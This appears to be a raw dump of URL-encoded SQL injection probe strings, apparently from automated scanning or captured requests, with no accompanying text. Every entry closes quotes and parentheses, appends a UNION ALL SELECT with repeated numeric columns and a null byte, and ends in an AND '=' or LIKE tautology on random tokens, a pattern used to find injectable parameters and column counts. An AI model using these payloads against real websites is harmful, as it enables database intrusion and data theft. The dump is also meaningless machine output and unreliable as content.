-2128%22%29%29%29%20UNION%20ALL%20SELECT%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%2C%207316%00%20AND%20%28%28%28%22lKlm%22%3D%22lKlm -3380%22%29%29%29%20UNION%20ALL%20SELECT%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%00%20AND%20%28%28%28%22UItN%22%3D%22UItN -7034%22%29%29%29%20UNION%20ALL%20SELECT%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%00%20AND%20%28%28%28%22NJcz%22%3D%22NJcz -8449%22%29%29%29%20UNION%20ALL%20SELECT%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%2C%204263%00%20AND%20%28%28%28%22xwAJ%22%3D%22xwAJ -1034%22%29%29%29%20UNION%20ALL%20SELECT%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%2C%206524%00%20AND%20%28%28%28%22MZrR%22%3D%22MZrR -6162%22%29%29%29%20UNION%20ALL%20SELECT%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%2C%201976%00%20AND%20%28%28%28%22xXUP%22%3D%22xXUP -2129%22%29%29%29%20UNION%20ALL%20SELECT%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%2C%204195%00%20AND%20%28%28%28%22vlhk%22%3D%22vlhk -5112%22%29%29%29%20UNION%20ALL%20SELECT%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%2C%207465%00%20AND%20%28%28%28%22Fvnw%22%3D%22Fvnw -3714%22%29%29%29%20UNION%20ALL%20SELECT%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%00%20AND%20%28%28%28%22sdoe%22%3D%22sdoe -3699%22%20UNION%20ALL%20SELECT%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%2C%207386%00%20AND%20%22mOYV%22%3D%22mOYV -4615%22%20UNION%20ALL%20SELECT%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%00%20AND%20%22DcQP%22%3D%22DcQP -1070%22%20UNION%20ALL%20SELECT%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%2C%204903%00%20AND%20%22uLLv%22%3D%22uLLv -2549%22%20UNION%20ALL%20SELECT%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%00%20AND%20%22Xnsr%22%3D%22Xnsr -5439%22%20UNION%20ALL%20SELECT%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%00%20AND%20%22sWTX%22%3D%22sWTX -8426%22%20UNION%20ALL%20SELECT%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%2C%204378%00%20AND%20%22uxsh%22%3D%22uxsh -4186%22%20UNION%20ALL%20SELECT%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%2C%204489%00%20AND%20%22DWfQ%22%3D%22DWfQ -1650%22%20UNION%20ALL%20SELECT%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%2C%204781%00%20AND%20%22vLBb%22%3D%22vLBb -6928%22%20UNION%20ALL%20SELECT%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%2C%201497%00%20AND%20%22ZYUV%22%3D%22ZYUV -7537%22%20UNION%20ALL%20SELECT%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%2C%201508%00%20AND%20%22aiuo%22%3D%22aiuo -5613%22%29%20UNION%20ALL%20SELECT%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%2C%204991%00%20AND%20%28%22PfMD%22%20LIKE%20%22PfMD -4660%22%29%20UNION%20ALL%20SELECT%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%2C%209082%00%20AND%20%28%22qArE%22%20LIKE%20%22qArE -8595%22%29%20UNION%20ALL%20SELECT%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%2C%206245%00%20AND%20%28%22Ldhi%22%20LIKE%20%22Ldhi -5979%22%29%20UNION%20ALL%20SELECT%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%2C%205570%00%20AND%20%28%22VCjT%22%20LIKE%20%22VCjT -2239%22%29%20UNION%20ALL%20SELECT%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%00%20AND%20%28%22VghY%22%20LIKE%20%22VghY -2301%22%29%20UNION%20ALL%20SELECT%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%2C%207157%00%20AND%20%28%22XGCh%22%20LIKE%20%22XGCh -3983%22%29%20UNION%20ALL%20SELECT%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%2C%208371%00%20AND%20%28%22JEju%22%20LIKE%20%22JEju -1050%22%29%20UNION%20ALL%20SELECT%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%2C%209350%00%20AND%20%28%22IxQg%22%20LIKE%20%22IxQg -7218%22%29%20UNION%20ALL%20SELECT%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%2C%209898%00%20AND%20%28%22zpjm%22%20LIKE%20%22zpjm -5347%22%29%20UNION%20ALL%20SELECT%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%2C%206154%00%20AND%20%28%22NGYb%22%20LIKE%20%22NGYb -5478%22%29%29%20UNION%20ALL%20SELECT%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%2C%206309%00%20AND%20%28%28%22DBMB%22%20LIKE%20%22DBMB -7066%22%29%29%20UNION%20ALL%20SELECT%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%2C%201074%00%20AND%20%28%28%22EueM%22%20LIKE%20%22EueM -6542%22%29%29%20UNION%20ALL%20SELECT%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%2C%201040%00%20AND%20%28%28%22Mzkb%22%20LIKE%20%22Mzkb -6288%22%29%29%20UNION%20ALL%20SELECT%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%2C%208811%00%20AND%20%28%28%22WaGW%22%20LIKE%20%22WaGW -7633%22%29%29%20UNION%20ALL%20SELECT%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%2C%207335%00%20AND%20%28%28%22hUkC%22%20LIKE%20%22hUkC -8139%22%29%29%20UNION%20ALL%20SELECT%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%00%20AND%20%28%28%22quiY%22%20LIKE%20%22quiY -7371%22%29%29%20UNION%20ALL%20SELECT%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%2C%205190%00%20AND%20%28%28%22pDxB%22%20LIKE%20%22pDxB -9519%22%29%29%20UNION%20ALL%20SELECT%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%2C%205501%00%20AND%20%28%28%22LSGB%22%20LIKE%20%22LSGB -7604%22%29%29%20UNION%20ALL%20SELECT%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%2C%205835%00%20AND%20%28%28%22KFDj%22%20LIKE%20%22KFDj -2732%22%29%29%20UNION%20ALL%20SELECT%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%2C%201954%00%20AND%20%28%28%22jDLX%22%20LIKE%20%22jDLX -3782%22%29%29%29%20UNION%20ALL%20SELECT%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%00%20AND%20%28%28%28%22ramA%22%20LIKE%20%22ramA -3218%22%29%29%29%20UNION%20ALL%20SELECT%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%2C%202049%00%20AND%20%28%28%28%22kTws%22%20LIKE%20%22kTws -4666%22%29%29%29%20UNION%20ALL%20SELECT%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%2C%202841%00%20AND%20%28%28%28%22XgsR%22%20LIKE%20%22XgsR -5401%22%29%29%29%20UNION%20ALL%20SELECT%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%2C%204015%00%20AND%20%28%28%28%22KMUG%22%20LIKE%20%22KMUG -7280%22%29%29%29%20UNION%20ALL%20SELECT%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%00%20AND%20%28%28%28%22JsiJ%22%20LIKE%20%22JsiJ -8670%22%29%29%29%20UNION%20ALL%20SELECT%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%2C%203283%00%20AND%20%28%28%28%22EGbx%22%20LIKE%20%22EGbx -6885%22%29%29%29%20UNION%20ALL%20SELECT%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%2C%206697%00%20AND%20%28%28%28%22wgia%22%20LIKE%20%22wgia -2978%22%29%29%29%20UNION%20ALL%20SELECT%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%2C%202053%00%20AND%20%28%28%28%22IcYv%22%20LIKE%20%22IcYv -7129%22%29%29%29%20UNION%20ALL%20SELECT%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%2C%209092%00%20AND%20%28%28%28%22Ahcc%22%20LIKE%20%22Ahcc -9751%22%29%29%29%20UNION%20ALL%20SELECT%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%2C%203289%00%20AND%20%28%28%28%22xTNv%22%20LIKE%20%22xTNv -4280%22%20UNION%20ALL%20SELECT%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%2C%205152%00%20AND%20%22FwRg%22%20LIKE%20%22FwRg -6843%22%20UNION%20ALL%20SELECT%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%00%20AND%20%22gRHb%22%20LIKE%20%22gRHb -8143%22%20UNION%20ALL%20SELECT%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%2C%203747%00%20AND%20%22YQSa%22%20LIKE%20%22YQSa -1208%22%20UNION%20ALL%20SELECT%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%00%20AND%20%22fLVE%22%20LIKE%20%22fLVE -7831%22%20UNION%20ALL%20SELECT%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%2C%209596%00%20AND%20%22apRa%22%20LIKE%20%22apRa -2582%22%20UNION%20ALL%20SELECT%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%2C%209609%00%20AND%20%22BIDX%22%20LIKE%20%22BIDX -6002%22%20UNION%20ALL%20SELECT%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%2C%205850%00%20AND%20%22YBnA%22%20LIKE%20%22YBnA 